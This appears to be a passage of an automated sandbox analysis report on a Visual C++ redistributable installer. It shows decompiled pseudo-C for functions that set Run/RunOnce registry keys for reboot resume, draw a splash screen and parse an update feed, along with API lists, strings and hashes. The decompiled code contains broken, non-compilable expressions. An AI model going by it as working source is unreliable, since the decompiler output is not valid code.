                                                                          0x00031b2d
                                                                          0x00031b36
                                                                          0x00031b37
                                                                          0x00031b3a
                                                                          0x00031b3d
                                                                          0x00031b43
                                                                          0x00000000
                                                                          0x00031b45
                                                                          0x00031b45
                                                                          0x00000000
                                                                          0x00031b45
                                                                          0x00031b43
                                                                          0x00031b00
                                                                          0x00031af5
                                                                          0x00031a7c
                                                                          0x00000000
                                                                          0x00031a60
                                                                          0x00031b7d
                                                                          0x00000000
                                                                          0x00031b7d
                                                                          0x000319ed
                                                                          0x000319ed
                                                                          0x000319fd
                                                                          0x00031a02
                                                                          0x00031b82
                                                                          0x00031b82
                                                                          0x00031b83
                                                                          0x00031b89
                                                                          0x000319eb
                                                                          0x00031b8e
                                                                          0x000319c2
                                                                          0x000319c2
                                                                          0x00000000
                                                                          0x000319c2
                                                                          0x0003199d
                                                                          0x0003199d
                                                                          0x000319a2
                                                                          0x000319a2
                                                                          0x000319a3
                                                                          0x000319a9
                                                                          0x00031b8f
                                                                          0x00031b94
                                                                          0x00031b99
                                                                          0x00031b99
                                                                          0x00031b9c
                                                                          0x00031ba1
                                                                          0x00031ba6
                                                                          0x00031ba6
                                                                          0x00031bad
                                                                          0x00031bb2
                                                                          0x00031bb2
                                                                          0x00031bbe

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00031A77
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00031A95
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareHeapString$AllocateProcess
                                                                          • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeuser.cpp$forceReboot$scheduleReboot$success
                                                                          • API String ID: 2664528157-1714101571
                                                                          • Opcode ID: 2dafa3c0ca9b3945123928648fac4025ff7a4fdc7a424a6dd02677255171c01d
                                                                          • Instruction ID: e6de628d7ca9b326e90e5da2b067b3dfad81cf8b003c0918024c6de1e9d52c35
                                                                          • Opcode Fuzzy Hash: 2dafa3c0ca9b3945123928648fac4025ff7a4fdc7a424a6dd02677255171c01d
                                                                          • Instruction Fuzzy Hash: A261F375E0421ABBCB229B94CC41EEEBBBDEF48720F204255F914AB2D1DB719E40D791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001F09D Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 180registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E0001F09D(void* __edx, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				signed short _t54;
				signed short _t59;
				void* _t70;
				void* _t71;
				void* _t76;
				intOrPtr _t77;
				void* _t79;

				_t76 = __edx;
				_t77 = _a4;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t5 = _t77 + 8; // 0x17886800
				_v20 = 0;
				_push(E00023C30( *_t5));
				_push(E00023C30(_a16));
				_push(E00024257(_a12));
				_t9 = _t77 + 0x50; // 0x60b8868
				E0001550F(2, 0x20000173,  *_t9);
				E000539CD( &_v16,  &_v20);
				_t70 = _a8;
				_t47 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
				_a4 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
				if(_t70 == 0) {
					L6:
					if(_a12 == 1) {
						goto L8;
					} else {
						goto L7;
					}
				} else {
					_t79 = E00051344(_t70, L"Resume", _a12);
					if(_t79 >= 0) {
						if(_a12 != 3) {
							goto L6;
						} else {
							_t79 = E00051344(_t70, L"Installed", 1);
							if(_t79 >= 0) {
								L7:
								if(_a16 == 0) {
									L17:
									_t31 = _t77 + 0x4c; // 0xa79f685
									_t79 = E00050E3F( *_t31, _a4, 0x20006,  &_v8);
									if(_t79 == 0x80070002 || _t79 == 0x80070003) {
										_t79 = 0;
										goto L22;
									} else {
										_t32 = _t77 + 0x10; // 0x6ae8fc75
										_t59 =  ==  ? 0 : RegDeleteValueW(_v8,  *_t32);
										if(_t59 == 0) {
											L22:
											if(_t70 != 0) {
												_t54 =  ==  ? 0 : RegDeleteValueW(_t70, L"BundleResumeCommandLine");
												if(_t54 != 0) {
													_t82 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
													_t79 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
													E000137D3(0x80004005, "registration.cpp", 0x4e1, _t79);
													_push("Failed to delete resume command line value.");
													goto L25;
												}
											}
										} else {
											_t85 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
											_t79 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "registration.cpp", 0x4d7, _t79);
											_push("Failed to delete run key value.");
											goto L25;
										}
									}
								} else {
									L8:
									if( *((intOrPtr*)(_t77 + 8)) != 0) {
										goto L17;
									} else {
										_push(L"burn.runonce");
										_t20 = _t77 + 0x54; // 0x33ae900
										_t79 = E00011F20( &_v12, L"\"%ls\" /%ls",  *_t20);
										if(_t79 >= 0) {
											_t24 = _t77 + 0x4c; // 0xa79f685
											_t79 = E00050A88( *_t24, _a4, 0x20006,  &_v8);
											if(_t79 >= 0) {
												_t26 = _t77 + 0x10; // 0x6ae8fc75
												_t79 = E00051392(_t71, _t76, _v8,  *_t26, _v12);
												if(_t79 >= 0) {
													_t28 = _t77 + 0x58; // 0x7f830000
													_t79 = E00051392(_t71, _t76, _t70, L"BundleResumeCommandLine",  *_t28);
													if(_t79 < 0) {
														_push("Failed to write resume command line value.");
														goto L25;
													}
												} else {
													_push("Failed to write run key value.");
													goto L25;
												}
											} else {
												_push("Failed to create run key.");
												goto L25;
											}
										} else {
											_push("Failed to format resume command line for RunOnce.");
											goto L25;
										}
									}
								}
							} else {
								_push("Failed to write Installed value.");
								goto L25;
							}
						}
					} else {
						_push("Failed to write Resume value.");
						L25:
						_push(_t79);
						E0005012F();
					}
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t79;
			}














                                                                          0x0001f09d
                                                                          0x0001f0a6
                                                                          0x0001f0ab
                                                                          0x0001f0b3
                                                                          0x0001f0b6
                                                                          0x0001f0b9
                                                                          0x0001f0bc
                                                                          0x0001f0c4
                                                                          0x0001f0cd
                                                                          0x0001f0d6
                                                                          0x0001f0d7
                                                                          0x0001f0e1
                                                                          0x0001f0f1
                                                                          0x0001f0ff
                                                                          0x0001f102
                                                                          0x0001f105
                                                                          0x0001f10a
                                                                          0x0001f14d
                                                                          0x0001f151
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001f10c
                                                                          0x0001f11a
                                                                          0x0001f11e
                                                                          0x0001f12e
                                                                          0x00000000
                                                                          0x0001f130
                                                                          0x0001f13d
                                                                          0x0001f141
                                                                          0x0001f153
                                                                          0x0001f157
                                                                          0x0001f1f4
                                                                          0x0001f200
                                                                          0x0001f208
                                                                          0x0001f210
                                                                          0x0001f261
                                                                          0x00000000
                                                                          0x0001f21a
                                                                          0x0001f21a
                                                                          0x0001f22b
                                                                          0x0001f230
                                                                          0x0001f263
                                                                          0x0001f265
                                                                          0x0001f278
                                                                          0x0001f27d
                                                                          0x0001f28a
                                                                          0x0001f294
                                                                          0x0001f2a2
                                                                          0x0001f2a7
                                                                          0x00000000
                                                                          0x0001f2a7
                                                                          0x0001f27d
                                                                          0x0001f232
                                                                          0x0001f23d
                                                                          0x0001f247
                                                                          0x0001f255
                                                                          0x0001f25a
                                                                          0x00000000
                                                                          0x0001f25a
                                                                          0x0001f230
                                                                          0x0001f15d
                                                                          0x0001f15d
                                                                          0x0001f161
                                                                          0x00000000
                                                                          0x0001f167
                                                                          0x0001f167
                                                                          0x0001f16c
                                                                          0x0001f17d
                                                                          0x0001f184
                                                                          0x0001f19c
                                                                          0x0001f1a4
                                                                          0x0001f1a8
                                                                          0x0001f1b7
                                                                          0x0001f1c2
                                                                          0x0001f1c6
                                                                          0x0001f1d2
                                                                          0x0001f1e0
                                                                          0x0001f1e4
                                                                          0x0001f1ea
                                                                          0x00000000
                                                                          0x0001f1ea
                                                                          0x0001f1c8
                                                                          0x0001f1c8
                                                                          0x00000000
                                                                          0x0001f1c8
                                                                          0x0001f1aa
                                                                          0x0001f1aa
                                                                          0x00000000
                                                                          0x0001f1aa
                                                                          0x0001f186
                                                                          0x0001f186
                                                                          0x00000000
                                                                          0x0001f186
                                                                          0x0001f184
                                                                          0x0001f161
                                                                          0x0001f143
                                                                          0x0001f143
                                                                          0x00000000
                                                                          0x0001f143
                                                                          0x0001f141
                                                                          0x0001f120
                                                                          0x0001f120
                                                                          0x0001f2ac
                                                                          0x0001f2ac
                                                                          0x0001f2ad
                                                                          0x0001f2b3
                                                                          0x0001f11e
                                                                          0x0001f2b8
                                                                          0x0001f2bd
                                                                          0x0001f2bd
                                                                          0x0001f2c6
                                                                          0x0001f2cb
                                                                          0x0001f2cb
                                                                          0x0001f2d9

                                                                          APIs
                                                                            • Part of subcall function 000539CD: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00053A1A
                                                                          • RegCloseKey.ADVAPI32(00000000,0A79F685,00020006,00020006,00000000,?,?,00000002,00000000,17886800,00000000,00000001,00000002), ref: 0001F2CB
                                                                            • Part of subcall function 00051344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          • BundleResumeCommandLine, xrefs: 0001F1D5, 0001F267
                                                                          • Failed to create run key., xrefs: 0001F1AA
                                                                          • Failed to delete run key value., xrefs: 0001F25A
                                                                          • Failed to write Resume value., xrefs: 0001F120
                                                                          • Failed to write resume command line value., xrefs: 0001F1EA
                                                                          • registration.cpp, xrefs: 0001F250, 0001F29D
                                                                          • Failed to write run key value., xrefs: 0001F1C8
                                                                          • Resume, xrefs: 0001F10F
                                                                          • Installed, xrefs: 0001F132
                                                                          • "%ls" /%ls, xrefs: 0001F172
                                                                          • Failed to format resume command line for RunOnce., xrefs: 0001F186
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 0001F0AE
                                                                          • burn.runonce, xrefs: 0001F167
                                                                          • Failed to delete resume command line value., xrefs: 0001F2A7
                                                                          • Failed to write Installed value., xrefs: 0001F143
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0001F0FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValueVersion
                                                                          • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
                                                                          • API String ID: 2348918689-3140388177
                                                                          • Opcode ID: ed8945c24a01806dbaaf0da7fd3437a41b5d242497d16405b77714f327eb0951
                                                                          • Instruction ID: 5a86ec8656279e8ac21d24f721b6ac390ccdc0274a572b0ae470f24b431c44ba
                                                                          • Opcode Fuzzy Hash: ed8945c24a01806dbaaf0da7fd3437a41b5d242497d16405b77714f327eb0951
                                                                          • Instruction Fuzzy Hash: 6C51DF36A8072AFADF21AAA4CC42BFF7AA5AF04750F144135FE00FA191D775DE9096C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E177 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 144registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E0002E177(void* __eflags, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				void _v24;
				struct tagMSG _v52;
				struct _WNDCLASSW _v92;
				int _t47;
				signed short _t58;
				signed short _t61;
				struct HWND__* _t67;
				signed int _t69;
				void** _t82;
				void* _t83;

				asm("stosd");
				_t69 = 0xa;
				_push(7);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v52, memset( &_v92, 0, _t69 << 2), 0 << 2);
				_t82 = _a4;
				_t83 = E0002E05E(_t82[1],  &_v24);
				if(_t83 >= 0) {
					_v92.lpfnWndProc = E0002E31B;
					_v92.hInstance = _t82[1];
					_v92.hCursor = LoadCursorW(0, 0x7f00);
					_v92.lpszClassName = L"WixBurnSplashScreen";
					if(RegisterClassW( &_v92) != 0) {
						_t67 = CreateWindowExW(0x80, _v92.lpszClassName, _t82[2], 0x90000000, _v20, _v16, _v12, _v8, 0, 0, _t82[1],  &_v24);
						if(_t67 != 0) {
							 *(_t82[3]) = _t67;
							SetEvent( *_t82);
							while(1) {
								_t47 = GetMessageW( &_v52, 0, 0, 0);
								if(_t47 == 0) {
									break;
								}
								if(_t47 == 0xffffffff) {
									_t83 = 0x8000ffff;
									_push("Unexpected return value from message pump.");
									L13:
									_push(_t83);
									E0005012F();
									L14:
									L15:
									UnregisterClassW(L"WixBurnSplashScreen", _t82[1]);
									if(_v24 != 0) {
										DeleteObject(_v24);
									}
									return _t83;
								}
								if(IsDialogMessageW(_t67,  &_v52) == 0) {
									TranslateMessage( &_v52);
									DispatchMessageW( &_v52);
								}
							}
							goto L14;
						}
						_t58 = GetLastError();
						_t86 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
						_t83 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "splashscreen.cpp", 0x8b, _t83);
						_push("Failed to create window.");
						goto L13;
					}
					_t61 = GetLastError();
					_t89 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
					_t83 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "splashscreen.cpp", 0x85, _t83);
					_push("Failed to register window.");
					goto L13;
				}
				_push("Failed to load splash screen.");
				_push(_t83);
				E0005012F();
				goto L15;
			}

















                                                                          0x0002e184
                                                                          0x0002e187
                                                                          0x0002e188
                                                                          0x0002e18a
                                                                          0x0002e18b
                                                                          0x0002e18c
                                                                          0x0002e18d
                                                                          0x0002e199
                                                                          0x0002e19b
                                                                          0x0002e1aa
                                                                          0x0002e1ae
                                                                          0x0002e1cd
                                                                          0x0002e1d5
                                                                          0x0002e1de
                                                                          0x0002e1e5
                                                                          0x0002e1f5
                                                                          0x0002e25a
                                                                          0x0002e25e
                                                                          0x0002e298
                                                                          0x0002e29c
                                                                          0x0002e2cc
                                                                          0x0002e2d5
                                                                          0x0002e2dd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002e2a7
                                                                          0x0002e2e1
                                                                          0x0002e2e6
                                                                          0x0002e2eb
                                                                          0x0002e2eb
                                                                          0x0002e2ec
                                                                          0x0002e2f3
                                                                          0x0002e2f4
                                                                          0x0002e2fc
                                                                          0x0002e306
                                                                          0x0002e30b
                                                                          0x0002e30b
                                                                          0x0002e318
                                                                          0x0002e318
                                                                          0x0002e2b6
                                                                          0x0002e2bc
                                                                          0x0002e2c6
                                                                          0x0002e2c6
                                                                          0x0002e2b6
                                                                          0x00000000
                                                                          0x0002e2df
                                                                          0x0002e260
                                                                          0x0002e271
                                                                          0x0002e27b
                                                                          0x0002e289
                                                                          0x0002e28e
                                                                          0x00000000
                                                                          0x0002e28e
                                                                          0x0002e1f7
                                                                          0x0002e208
                                                                          0x0002e212
                                                                          0x0002e220
                                                                          0x0002e225
                                                                          0x00000000
                                                                          0x0002e225
                                                                          0x0002e1b0
                                                                          0x0002e1b5
                                                                          0x0002e1b6
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 0002E05E: LoadBitmapW.USER32(?,00000001), ref: 0002E094
                                                                            • Part of subcall function 0002E05E: GetLastError.KERNEL32 ref: 0002E0A0
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0002E1D8
                                                                          • RegisterClassW.USER32 ref: 0002E1EC
                                                                          • GetLastError.KERNEL32 ref: 0002E1F7
                                                                          • UnregisterClassW.USER32 ref: 0002E2FC
                                                                          • DeleteObject.GDI32(00000000), ref: 0002E30B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                          • String ID: @Met$Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                          • API String ID: 164797020-3202933377
                                                                          • Opcode ID: a0aec76493d5d552925db1e155cdb18e664aed5497b6823c92764ec2a0a542c7
                                                                          • Instruction ID: d934ca2ac8cff9bfecdb557b3aa23309384b88a56d722865f19ea84d3334b55c
                                                                          • Opcode Fuzzy Hash: a0aec76493d5d552925db1e155cdb18e664aed5497b6823c92764ec2a0a542c7
                                                                          • Instruction Fuzzy Hash: 0B419D72A40769FFEB119BE4ED49AAFB7ADFF04311F100125FA05E61A0D774AE0486A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00057FEC Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00057FEC(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t100;
				int _t101;
				signed int _t103;
				short** _t110;
				int _t111;
				signed int _t113;
				signed int _t122;
				int _t131;
				int _t132;
				int _t133;
				signed int _t142;
				int _t143;
				int _t145;
				int _t148;
				signed int _t156;
				int _t157;
				intOrPtr* _t162;
				signed int _t163;
				signed int _t170;
				short** _t173;
				intOrPtr _t174;
				signed int _t175;

				_t162 = _a12;
				_t170 = 0;
				_t100 = 0;
				_v8 = 0;
				_t173 =  *(_a4 + 0x3c);
				while(_t173 != 0) {
					_t101 = CompareStringW(0x7f, 0,  *_t173, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff);
					__eflags = _t101 - 2;
					if(_t101 != 2) {
						L9:
						_t100 = _v8;
						L10:
						_t173 = _t173[4];
						continue;
					}
					_t131 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"application", 0xffffffff);
					__eflags = _t131 - 2;
					if(_t131 != 2) {
						_t132 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"upgrade", 0xffffffff);
						__eflags = _t132 - 2;
						if(_t132 != 2) {
							_t133 = CompareStringW(0x7f, 0, _t173[1], 0xffffffff, L"version", 0xffffffff);
							__eflags = _t133 - 2;
							if(_t133 != 2) {
								goto L9;
							}
							_a12 = _a12 & 0x00000000;
							_v16 = _v16 & 0x00000000;
							_t170 = E00054A39(_t173[2],  &_a12,  &_v16);
							__eflags = _t170;
							if(__eflags < 0) {
								L54:
								if(__eflags == 0) {
									L56:
									return _t170;
								}
								L55:
								E00057DA1(_t162, _t170, _t162);
								E0003F670(_t170, _t162, 0, 0x40);
								goto L56;
							}
							 *((intOrPtr*)(_t162 + 0x20)) = _v16;
							_t100 = 1;
							 *((intOrPtr*)(_t162 + 0x24)) = _a12;
							_v8 = 1;
							goto L10;
						}
						_t20 = _t162 + 0x18; // 0x18
						_t170 = E000121A5(_t20, _t173[2], 0);
						__eflags = _t170;
						if(__eflags < 0) {
							goto L54;
						}
						_t142 = _t173[3];
						while(1) {
							_a12 = _t142;
							__eflags = _t142;
							if(_t142 == 0) {
								break;
							}
							_t22 = _t142 + 4; // 0x700079
							_t143 = CompareStringW(0x7f, 0,  *_t22, 0xffffffff, L"version", 0xffffffff);
							__eflags = _t143 - 2;
							if(_t143 != 2) {
								_t145 = CompareStringW(0x7f, 0,  *(_a12 + 4), 0xffffffff, L"exclusive", 0xffffffff);
								__eflags = _t145 - 2;
								if(_t145 == 2) {
									_t148 = CompareStringW(0x7f, 0,  *(_a12 + 8), 0xffffffff, L"true", 0xffffffff);
									__eflags = _t148 - 2;
									if(_t148 == 2) {
										 *((intOrPtr*)(_t162 + 0x1c)) = 1;
									}
								}
								L25:
								_t142 =  *(_a12 + 0xc);
								continue;
							}
							_v12 = _v12 & 0x00000000;
							_v16 = _v16 & 0x00000000;
							_t170 = E00054A39( *(_a12 + 8),  &_v12,  &_v16);
							__eflags = _t170;
							if(__eflags < 0) {
								goto L54;
							}
							 *(_t162 + 0x28) = _v16;
							 *(_t162 + 0x2c) = _v12;
							goto L25;
						}
						goto L9;
					}
					_t170 = E000121A5(_t162, _t173[2], 0);
					__eflags = _t170;
					if(__eflags < 0) {
						goto L54;
					} else {
						_t156 = _t173[3];
						while(1) {
							_a12 = _t156;
							__eflags = _t156;
							if(_t156 == 0) {
								goto L9;
							}
							_t8 = _t156 + 4; // 0x700079
							_t157 = CompareStringW(0x7f, 0,  *_t8, 0xffffffff, L"type", 0xffffffff);
							__eflags = _t157 - 2;
							if(_t157 != 2) {
								L7:
								_t13 = _a12 + 0xc; // 0x74006e
								_t156 =  *_t13;
								continue;
							}
							_t11 = _t162 + 4; // 0x4
							_t170 = E000121A5(_t11,  *(_a12 + 8), 0);
							__eflags = _t170;
							if(__eflags < 0) {
								goto L54;
							}
							goto L7;
						}
						goto L9;
					}
				}
				if( *_t162 != _t173 || _a8 != _t173) {
					if(_t100 != 0) {
						_t102 =  *(_t162 + 0x2c);
						__eflags =  *(_t162 + 0x2c) -  *((intOrPtr*)(_t162 + 0x24));
						if(__eflags < 0) {
							L36:
							_t174 = _a4;
							__eflags =  *(_t174 + 8);
							if( *(_t174 + 8) == 0) {
								L38:
								__eflags =  *(_t174 + 4);
								if( *(_t174 + 4) == 0) {
									L40:
									_t103 =  *(_t174 + 0x1c);
									__eflags = _t103;
									if(_t103 == 0) {
										L45:
										_t102 = E000138D4( *(_t174 + 0x30) << 5, 1);
										 *(_t162 + 0x3c) = _t102;
										__eflags = _t102;
										if(_t102 != 0) {
											_a12 = _a12 & 0x00000000;
											__eflags =  *(_t174 + 0x30);
											if( *(_t174 + 0x30) <= 0) {
												L53:
												__eflags = _t170;
												goto L54;
											}
											_t163 = 0;
											__eflags = 0;
											_a8 = 0;
											do {
												_t110 =  *((intOrPtr*)(_t174 + 0x34)) + _t163;
												_v16 = _t110;
												_t111 = CompareStringW(0x7f, 0,  *_t110, 0xffffffff, L"enclosure", 0xffffffff);
												__eflags = _t111 - 2;
												if(_t111 != 2) {
													goto L52;
												}
												_t170 = E00057E36(_t163, _v16, ( *(_t162 + 0x38) << 5) +  *(_t162 + 0x3c));
												__eflags = _t170;
												if(__eflags < 0) {
													goto L54;
												}
												_t175 =  *(_t162 + 0x38);
												_t88 = _t162 + 0x30;
												 *_t88 =  *(_t162 + 0x30) +  *((intOrPtr*)((_t175 << 5) +  *(_t162 + 0x3c) + 8));
												__eflags =  *_t88;
												asm("adc [ebx+0x34], eax");
												_t174 = _a4;
												 *(_t162 + 0x38) = _t175 + 1;
												L52:
												_t113 = _a12 + 1;
												_t163 = _a8 + 0x28;
												_a12 = _t113;
												_a8 = _t163;
												__eflags = _t113 -  *(_t174 + 0x30);
											} while (_t113 <  *(_t174 + 0x30));
											goto L53;
										}
										_t170 = 0x8007000e;
										_push(0x8007000e);
										_push(0x12c);
										L35:
										_push("apuputil.cpp");
										E000137D3(_t102);
										goto L55;
									}
									__eflags =  *_t103;
									if( *_t103 == 0) {
										L43:
										_t122 =  *(_t174 + 0x1c);
										__eflags =  *(_t122 + 8);
										if( *(_t122 + 8) == 0) {
											goto L45;
										}
										_t72 = _t162 + 0x14; // 0x14
										_t170 = E000121A5(_t72,  *(_t122 + 8), 0);
										__eflags = _t170;
										if(__eflags < 0) {
											goto L54;
										}
										goto L45;
									}
									_t68 = _t162 + 0x10; // 0x10
									_t170 = E000121A5(_t68,  *_t103, 0);
									__eflags = _t170;
									if(__eflags < 0) {
										goto L54;
									}
									goto L43;
								}
								_t66 = _t162 + 0xc; // 0xc
								_t170 = E000121A5(_t66,  *(_t174 + 4), 0);
								__eflags = _t170;
								if(__eflags < 0) {
									goto L54;
								}
								goto L40;
							}
							_t63 = _t162 + 8; // 0x8
							_t170 = E000121A5(_t63,  *(_t174 + 8), 0);
							__eflags = _t170;
							if(__eflags < 0) {
								goto L54;
							}
							goto L38;
						}
						if(__eflags > 0) {
							L34:
							_t170 = 0x8007000d;
							_push(0x8007000d);
							_push(0x10d);
							goto L35;
						}
						_t102 =  *(_t162 + 0x28);
						__eflags =  *(_t162 + 0x28) -  *((intOrPtr*)(_t162 + 0x20));
						if( *(_t162 + 0x28) <  *((intOrPtr*)(_t162 + 0x20))) {
							goto L36;
						}
						goto L34;
					}
					goto L15;
				} else {
					L15:
					_t170 = 1;
					goto L55;
				}
			}






























                                                                          0x00057ff3
                                                                          0x00057ffb
                                                                          0x00057ffd
                                                                          0x00057fff
                                                                          0x00058002
                                                                          0x000580a6
                                                                          0x00058019
                                                                          0x0005801f
                                                                          0x00058022
                                                                          0x000580a0
                                                                          0x000580a0
                                                                          0x000580a3
                                                                          0x000580a3
                                                                          0x00000000
                                                                          0x000580a3
                                                                          0x00058034
                                                                          0x0005803a
                                                                          0x0005803d
                                                                          0x000580d7
                                                                          0x000580dd
                                                                          0x000580e0
                                                                          0x000581bf
                                                                          0x000581c5
                                                                          0x000581c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000581ce
                                                                          0x000581d5
                                                                          0x000581e6
                                                                          0x000581e8
                                                                          0x000581ea
                                                                          0x0005835f
                                                                          0x0005835f
                                                                          0x00058374
                                                                          0x0005837c
                                                                          0x0005837c
                                                                          0x00058361
                                                                          0x00058362
                                                                          0x0005836c
                                                                          0x00000000
                                                                          0x00058371
                                                                          0x000581f8
                                                                          0x000581fd
                                                                          0x000581fe
                                                                          0x00058201
                                                                          0x00000000
                                                                          0x00058201
                                                                          0x000580eb
                                                                          0x000580f4
                                                                          0x000580f6
                                                                          0x000580f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000580fe
                                                                          0x0005819f
                                                                          0x0005819f
                                                                          0x000581a2
                                                                          0x000581a4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005810f
                                                                          0x00058116
                                                                          0x0005811c
                                                                          0x0005811f
                                                                          0x00058169
                                                                          0x0005816f
                                                                          0x00058172
                                                                          0x00058187
                                                                          0x0005818d
                                                                          0x00058190
                                                                          0x00058192
                                                                          0x00058192
                                                                          0x00058190
                                                                          0x00058199
                                                                          0x0005819c
                                                                          0x00000000
                                                                          0x0005819c
                                                                          0x00058121
                                                                          0x00058128
                                                                          0x0005813c
                                                                          0x0005813e
